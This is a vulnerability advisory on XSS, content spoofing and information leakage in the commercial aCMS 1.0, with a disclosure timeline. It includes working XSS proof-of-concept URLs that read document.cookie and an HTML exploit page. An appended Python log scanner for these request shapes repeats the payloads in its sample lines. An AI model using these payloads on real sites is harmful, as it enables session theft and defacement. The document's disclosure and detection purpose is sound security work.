aCMS 1.0 XSS / Content Spoofing / Information Leak

27 May 2013 | Reported by MustLive | Type: packetstorm | Source: packetstormsecurity.com

Cross-Site Scripting, Content Spoofing, and Information Leakage vulnerabilities in aCMS 1.0 and previous versions: XSS via ZeroClipboard10.swf, Content Spoofing in SWF files, and Information Leakage at the error 404 page.

Code
`Hello list!  
  
These are Cross-Site Scripting, Content Spoofing and Information Leakage   
vulnerabilities in aCMS. This is a commercial CMS. There are multiple   
vulnerabilities in aCMS and this is the first part of them.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are aCMS 1.0 and previous versions.  
  
-------------------------  
Affected vendors:  
-------------------------  
  
Almacor  
http://almacor.ru  
  
----------  
Details:  
----------  
  
Cross-Site Scripting (WASC-08):  
  
For ZeroClipboard10.swf, XSS via the id parameter and XSS via copying a payload   
into the clipboard are possible.  
  
http://site/assets/swf/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height  
  
http://site/assets/swf/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E  
  
Content Spoofing (WASC-12):  
  
The SWF file accepts arbitrary addresses in the parameters flvToPlay and startImage,   
which allows spoofing the content of the flash file, i.e. by setting addresses of video   
and/or image files from another site.  
  
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv  
  
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?autoStart=false&startImage=http://site2/1.jpg  
  
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv&autoStart=false&startImage=http://site2/1.jpg  
  
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.xml  
  
The SWF file accepts arbitrary addresses in the parameter flvToPlay, which allows   
spoofing the content of the flash file, i.e. by setting the address of a playlist file from   
another site (the parameters thumbnail and url in the XML file accept arbitrary addresses).  
  
File 1.xml:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<playlist>  
<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>  
<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>  
</playlist>  
  
Cross-Site Scripting (WASC-08):  
  
If, on a page of the site with flv_player.swf (with parameter jsCallback=true,   
or if there is a possibility to set this parameter for flv_player.swf), there   
is a possibility to include JS code with the functions flvStart() and/or flvEnd()   
(via HTML Injection), then it's possible to conduct an XSS attack. I.e.   
JS callbacks can be used for an XSS attack.  
  
Example of exploit:  
  
<html>  
<body>  
<script>  
function flvStart() {  
alert('XSS');  
}  
function flvEnd() {  
alert('XSS');  
}  
</script>  
<object width="50%" height="50%">  
<param name=movie value="flv_player.swf?flvToPlay=1.flv&jsCallback=true">  
<param name=quality value=high>  
<embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%"   
height="50%" quality=high   
pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"   
type="application/x-shockwave-flash"></embed>  
</object>  
</body>  
</html>  
  
Information Leakage (WASC-13):  
  
http://site/assets/1  
  
At the error 404 page there are Source Code Disclosure, Full Path Disclosure and   
a listing of the files and other information.  
  
------------  
Timeline:  
------------   
  
2013.03.04 - informed developers about part of the vulnerabilities.  
2013.04.03 - informed developers about another part of the vulnerabilities.  
2013.04.05 - announced at my site.  
2013.04.07 - informed developers about another part of the vulnerabilities.  
2013.05.25 - informed developers about another part of the vulnerabilities.   
In all cases the developers just ignored all messages sent via different e-mails   
and the contact form.  
2013.05.25 - disclosed at my site (http://websecurity.com.ua/6423/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`
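As an added defensive example (not part of MustLive's advisory or of aCMS itself), the script below audits web-server access-log lines for the request shapes the advisory describes: off-site addresses in the flvToPlay/startImage parameters of flv_player.swf, and JS-string-breakout or markup characters in the id parameter of ZeroClipboard10.swf and the tagcloud parameter of tagcloud.swf. The combined log format and the sample lines are assumptions constructed for this example; the same `is_offsite` check is what a server-side wrapper would apply before passing a media address to the player.

```python
import re
from urllib.parse import parse_qs, urlsplit

SWF_URL_PARAMS = {"flvToPlay", "startImage"}   # flv_player.swf: media/playlist address
SWF_TEXT_PARAMS = {"id", "tagcloud"}            # ZeroClipboard10.swf / tagcloud.swf
# Characters that let a value break out of a JS string literal or inject markup.
BREAKOUT = re.compile(r"""["'(){}<>]|javascript:""", re.IGNORECASE)
# Common/combined log format: client ident user [time] "METHOD target HTTP/x"
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) HTTP/')

# Constructed sample lines modelled on the advisory's request shapes (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [27/May/2013:10:00:01 +0000] "GET /assets/swf/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height HTTP/1.1" 200 1234
10.0.0.6 - - [27/May/2013:10:00:02 +0000] "GET /assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv HTTP/1.1" 200 5678
10.0.0.7 - - [27/May/2013:10:00:03 +0000] "GET /assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=videos/intro.flv&autoStart=false HTTP/1.1" 200 5678
10.0.0.8 - - [27/May/2013:10:00:04 +0000] "GET /assets/swf/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(1)%27%3Ex%3C/a%3E%3C/tags%3E HTTP/1.1" 200 99
"""

def is_offsite(value: str) -> bool:
    """True when a media/playlist address leaves the hosting site; the same check,
    applied server-side before the value reaches the player, is the mitigation."""
    value = value.strip()
    parts = urlsplit(value)
    return bool(parts.scheme or parts.netloc) or value.startswith("//")

def audit_request(target: str) -> list:
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(".swf"):
        return []
    findings = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:  # parse_qs already percent-decodes the value
            if name in SWF_URL_PARAMS and is_offsite(value):
                findings.append(f"offsite address in {name}: {value}")
            elif name in SWF_TEXT_PARAMS and BREAKOUT.search(value):
                findings.append(f"script/markup characters in {name}")
    return findings

def scan_log(text: str) -> list:
    """Return (client, target, findings) for each log line that raises a finding."""
    hits = []
    for line in text.splitlines():
        match = REQ_RE.match(line)
        if match:
            client, target = match.groups()
            findings = audit_request(target)
            if findings:
                hits.append((client, target, findings))
    return hits
```

Only the lines with an off-site address or breakout characters are reported; the legitimate relative-path request from 10.0.0.7 is passed over.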
